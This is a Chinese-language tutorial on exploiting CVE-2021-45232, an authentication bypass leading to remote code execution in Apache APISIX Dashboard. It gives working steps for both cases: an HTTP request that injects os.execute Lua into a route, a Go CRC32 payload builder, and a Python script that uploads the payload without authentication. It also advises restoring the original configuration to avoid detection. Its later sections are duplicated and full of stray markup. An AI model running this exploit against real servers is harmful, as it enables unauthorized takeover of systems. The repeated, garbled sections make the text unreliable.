Apache APISIX Dashboard RCE漏洞(CVE-2021-45232)深度分析与利用教学<\/h1>

漏洞概述<\/h2>
CVE-2021-45232是Apache APISIX Dashboard中的一个高危漏洞，允许攻击者通过未授权访问特定API实现远程代码执行(RCE)。该漏洞存在于Manager API中，由于部分接口绕过身份验证机制，导致攻击者可以操控路由配置并注入恶意Lua脚本。<\/p>

受影响版本<\/h2>

Apache APISIX Dashboard < 2.10.1<\/li> <\/ul>

漏洞原理<\/h2>

身份验证绕过<\/h3>

漏洞的根本原因是Manager API在gin框架基础上引入了droplet框架，但部分API直接使用了gin框架的接口，从而绕过了droplet框架的身份验证机制。具体来说，以下两个关键API可以未授权访问：<\/p>

\/apisix\/admin\/migrate\/export<\/code> - 导出当前配置<\/li>

\/apisix\/admin\/migrate\/import<\/code> - 导入新配置<\/li>
<\/ol>
RCE实现机制<\/h3>
APISIX在请求转发过程中允许用户自定义Lua脚本，这是其设计特性。攻击者可以通过修改路由配置，在script<\/code>字段中插入恶意Lua代码（如os.execute()<\/code>），当该路由被访问时就会执行相应命令。<\/p>
环境搭建<\/h2>
使用Docker快速搭建漏洞环境：<\/p>
git clone https:\/\/github.com\/apache\/apisix-docker
<\/span><\/span>cd apisix-docker\/example\/
<\/span><\/span><\/code><\/pre>修改docker-compose.yml<\/code>文件，确保使用存在漏洞的版本：<\/p>

apache\/apisix-dashboard:2.7<\/code><\/li>
apache\/apisix:2.6-alpine<\/code><\/li>
<\/ul>
注意版本匹配问题，apisix-dashboard-2.7需要与apisix-2.6配合使用。<\/p>
漏洞复现步骤<\/h2>
授权情况下的RCE<\/h3>

访问Dashboard（默认端口9000），使用admin\/admin登录<\/li>
创建Upstream：

Name: 任意<\/li>
Targets: 填写目标服务地址（如内置Grafana应用，端口3000）<\/li>
<\/ul>
<\/li>
创建Route：

Name: 任意<\/li>
Path: 自定义路径（如\/rce1）<\/li>
Select Upstream: 选择刚创建的Upstream<\/li>
<\/ul>
<\/li>
抓包修改Route配置：

在编辑Route时拦截请求，添加script<\/code>字段：<\/li>
<\/ol>
PUT<\/span> \/apisix\/admin\/routes\/387835847795278530 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.1.129:9000<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json;charset=UTF-8<\/span>
<\/span><\/span>Authorization:<\/span> [your_token]<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "uris"<\/span>: ["\/rce1"<\/span>],
<\/span><\/span>  "methods"<\/span>: ["GET"<\/span>, "POST"<\/span>, "PUT"<\/span>, "DELETE"<\/span>, "PATCH"<\/span>, "HEAD"<\/span>, "OPTIONS"<\/span>, "CONNECT"<\/span>, "TRACE"<\/span>],
<\/span><\/span>  "priority"<\/span>: 0<\/span>,
<\/span><\/span>  "name"<\/span>: "rce1"<\/span>,
<\/span><\/span>  "status"<\/span>: 1<\/span>,
<\/span><\/span>  "labels"<\/span>: {},
<\/span><\/span>  "script"<\/span>: "os.execute('touch \/tmp\/yyztest')"<\/span>,
<\/span><\/span>  "upstream_id"<\/span>: "387837637639013058"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
访问触发路由：http:\/\/[target]:9080\/rce1<\/code><\/li>
验证命令执行：检查Docker容器中是否创建了\/tmp\/yyztest<\/code>文件<\/li>
<\/ol>
未授权情况下的RCE<\/h3>

导出当前配置：<\/li>
<\/ol>
GET<\/span> \/apisix\/admin\/migrate\/export HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.1.129:9000<\/span>
<\/span><\/span><\/code><\/pre>
修改配置文件，在Routes和Scripts部分添加恶意脚本：<\/li>
<\/ol>
{
<\/span><\/span>  "Routes"<\/span>: [{
<\/span><\/span>    "id"<\/span>: "387929469693723331"<\/span>,
<\/span><\/span>    "uris"<\/span>: ["\/rce1"<\/span>],
<\/span><\/span>    "name"<\/span>: "rce1"<\/span>,
<\/span><\/span>    "methods"<\/span>: ["GET"<\/span>, "POST"<\/span>, "PUT"<\/span>, "DELETE"<\/span>, "PATCH"<\/span>, "HEAD"<\/span>, "OPTIONS"<\/span>, "CONNECT"<\/span>, "TRACE"<\/span>],
<\/span><\/span>    "script"<\/span>: "os.execute('touch \/tmp\/yyztest22')"<\/span>,
<\/span><\/span>    "script_id"<\/span>: "387929469693723331"<\/span>,
<\/span><\/span>    "upstream_id"<\/span>: "387928730657358531"<\/span>,
<\/span><\/span>    "status"<\/span>: 1<\/span>
<\/span><\/span>  }],
<\/span><\/span>  "Scripts"<\/span>: [{
<\/span><\/span>    "id"<\/span>: "387929469693723331"<\/span>,
<\/span><\/span>    "script"<\/span>: "os.execute('touch \/tmp\/yyztest22')"<\/span>
<\/span><\/span>  }]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
计算新的CRC32校验和（Go示例）：<\/li>
<\/ol>
package<\/span> main<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> (
<\/span><\/span>  "encoding\/binary"<\/span>
<\/span><\/span>  "hash\/crc32"<\/span>
<\/span><\/span>  "io\/ioutil"<\/span>
<\/span><\/span>  "os"<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>func<\/span> main<\/span>() {
<\/span><\/span>  data<\/span> :=<\/span> []byte(`{...your modified config...}`<\/span>)
<\/span><\/span>  checksumUint32<\/span> :=<\/span> crc32<\/span>.ChecksumIEEE<\/span>(data<\/span>)
<\/span><\/span>  checksum<\/span> :=<\/span> make([]byte<\/span>, 4<\/span>)
<\/span><\/span>  binary<\/span>.BigEndian<\/span>.PutUint32<\/span>(checksum<\/span>, checksumUint32<\/span>)
<\/span><\/span>  fileBytes<\/span> :=<\/span> append(data<\/span>, checksum<\/span>...<\/span>)
<\/span><\/span>  ioutil<\/span>.WriteFile<\/span>("apisixPayload"<\/span>, fileBytes<\/span>, os<\/span>.ModePerm<\/span>)
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
使用Python上传修改后的配置：<\/li>
<\/ol>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.1.129:9000\/apisix\/admin\/migrate\/import"<\/span>
<\/span><\/span>files =<\/span> {"file"<\/span>: open("apisixPayload"<\/span>, "rb"<\/span>)}
<\/span><\/span>r =<\/span> requests.<\/span>post(url, data=<\/span>{"mode"<\/span>: "overwrite"<\/span>}, files=<\/span>files)
<\/span><\/span>print(r.<\/span>status_code)
<\/span><\/span><\/code><\/pre>
访问触发路由：http:\/\/[target]:9080\/rce1<\/code><\/li>
<\/ol>
漏洞修复<\/h2>
升级到Apache APISIX Dashboard 2.10.1或更高版本。修复方案主要是在api\internal\filter\authentication.go<\/code>中新增了Authentication()<\/code>函数，并在路由处理中强制进行鉴权。<\/p>
检测与验证<\/h2>
由于该RCE无回显，可通过以下方式验证：<\/p>

DNS查询：使用os.execute('nslookup yourdomain.dnslog.cn')<\/code><\/li>
文件时间戳：检查特定文件的修改时间（Linux下）<\/li>
网络流量：监控出站连接<\/li>
<\/ol>
技术要点总结<\/h2>

漏洞根源在于部分API绕过droplet框架的鉴权<\/li>
利用APISIX支持自定义Lua脚本的特性实现RCE<\/li>
通过导出\/导入配置功能实现未授权操作<\/li>
配置文件需要正确的CRC32校验和<\/li>
攻击后注意恢复原始配置以避免被发现<\/li>
<\/ol>
防御建议<\/h2>

及时升级到安全版本<\/li>
限制APISIX Dashboard的管理接口访问<\/li>
监控配置文件的异常修改<\/li>
审计Lua脚本内容，限制危险函数使用<\/li>
<\/ol>
参考资源<\/h2>

官方文档：https:\/\/apisix.apache.org\/<\/li>
CVE详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45232<\/li>
修复提交：https:\/\/github.com\/apache\/apisix-dashboard\/commit\/...<\/li>
<\/ol>

Apache APISIX Dashboard RCE漏洞(CVE-2021-45232)深度分析与利用教学<\/h1>

漏洞原理<\/h2>

RCE实现机制<\/h3>
APISIX在请求转发过程中允许用户自定义Lua脚本，这是其设计特性。攻击者可以通过修改路由配置，在`script<\/code>字段中插入恶意Lua代码（如os.execute()<\/code>），当该路由被访问时就会执行相应命令。<\/p>`

漏洞复现步骤<\/h2>

漏洞修复<\/h2>
升级到Apache APISIX Dashboard 2.10.1或更高版本。修复方案主要是在`api\internal\filter\authentication.go<\/code>中新增了Authentication()<\/code>函数，并在路由处理中强制进行鉴权。<\/p>`

参考资源<\/h2>

官方文档：https:\/\/apisix.apache.org\/<\/li>
CVE详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45232<\/li>
修复提交：https:\/\/github.com\/apache\/apisix-dashboard\/commit\/...<\/li> <\/ol>

Apache APISIX Dashboard RCE漏洞(CVE-2021-45232)深度分析与利用教学<\/h1>

漏洞原理<\/h2>

RCE实现机制<\/h3> APISIX在请求转发过程中允许用户自定义Lua脚本，这是其设计特性。攻击者可以通过修改路由配置，在script<\/code>字段中插入恶意Lua代码（如os.execute()<\/code>），当该路由被访问时就会执行相应命令。<\/p>

漏洞复现步骤<\/h2>

漏洞修复<\/h2> 升级到Apache APISIX Dashboard 2.10.1或更高版本。修复方案主要是在api\internal\filter\authentication.go<\/code>中新增了Authentication()<\/code>函数，并在路由处理中强制进行鉴权。<\/p>

参考资源<\/h2> 官方文档：https:\/\/apisix.apache.org\/<\/li> CVE详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45232<\/li> 修复提交：https:\/\/github.com\/apache\/apisix-dashboard\/commit\/...<\/li> <\/ol>

RCE实现机制<\/h3>
APISIX在请求转发过程中允许用户自定义Lua脚本，这是其设计特性。攻击者可以通过修改路由配置，在`script<\/code>字段中插入恶意Lua代码（如os.execute()<\/code>），当该路由被访问时就会执行相应命令。<\/p>`

漏洞修复<\/h2>
升级到Apache APISIX Dashboard 2.10.1或更高版本。修复方案主要是在`api\internal\filter\authentication.go<\/code>中新增了Authentication()<\/code>函数，并在路由处理中强制进行鉴权。<\/p>`

参考资源<\/h2>

官方文档：https:\/\/apisix.apache.org\/<\/li>
CVE详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45232<\/li>
修复提交：https:\/\/github.com\/apache\/apisix-dashboard\/commit\/...<\/li> <\/ol>